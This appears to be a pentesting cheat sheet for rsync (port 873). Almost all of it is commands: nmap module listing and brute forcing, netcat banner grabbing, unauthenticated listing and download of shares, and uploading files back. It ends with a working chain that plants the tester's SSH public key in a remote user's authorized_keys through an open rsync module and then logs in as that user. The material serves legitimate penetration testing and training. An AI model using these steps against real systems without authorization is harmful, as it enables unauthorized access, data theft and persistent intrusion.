Rsync Pentesting

Last modified: 2023-02-06


Rsync is utility for efficiently transferring and synchronizing files between a computer and a storage drive and across networked computers by comparing the modification times and sizes of files. A default port is 873.


nmap --script rsync-list-modules -p 873 <target-ip>
nmap --script rsync-brute --script-args 'rsync-brute.module=www' <target-ip>

# Banner grabbing and list shared folders
# We can execute commands (modules) that we found, after entering '@RSYNCD: <version>'.
nc -nv <target-ip> 873
@RSYNCD: 31.0

# List sync data using rsync
rsync <target-ip>::
rsync -av --list-only rsync://<target-ip>

# List sync data using Metasploit
msf> use auxiliary/scanner/rsync/modules_list

When we found the shared folder, check if we can connect without authentication.
Assume that we found the “shares” folder.

# Netcat
nc -nv <target-ip> 873
RSYNCD: 31.0

# Rsync
rsync <target-ip>::shares
rsync -av --list-only rsync://<target-ip>:873/shares

Check Config File

find / -name "rsyncd.conf" 2>/dev/null
cat /path/to/rsyncd.conf

Sync Data

After gathering modules (shared folders), we can sync it with our local folder.

From Remote to Local

We can sync a remote folder with a local folder.

# -a: Arvhice
# -v: Verbose
rsync -av <remote-ip>::<src_dir> <dest_dir>

# e.g. Assume we found the "share" folder with rsync enumeration.
mkdir test_shared
rsync -av <remote-ip>::share test_shared
rsync -av rsync://<remote-ip>:873/share test_shared

If we want to update sync data, modify files in the shared folder then rsync back with “From Local to Remote”.

From Local to Remote

We can sync our local folder with a remote folder.

# -a: Arvhice
# -v: Verbose
rsync -av <src_dir> <remote-ip>::<dest_dir>

# e.g. Assume we found the "share" folder with rsync enumeration.
rsync -av test_shared <remote-ip>::share
rsync -av test_shared rsync://<remote-ip>:873/share

SSH Key Syncing and SSH Login

1. Generate a SSH key in local machine

Copy the content of the public key to the authorized_keys.

ssh-keygen -f testkey
cat > authorized_keys

2. Sync the authorized_keys with the remote .ssh directory

rsync authorized_keys rsync://<remote-user>@<remote-ip>:873/<home_user>/.ssh

3. SSH login with the generated private key

ssh <remote-home-user>@<remote-ip> -i testkey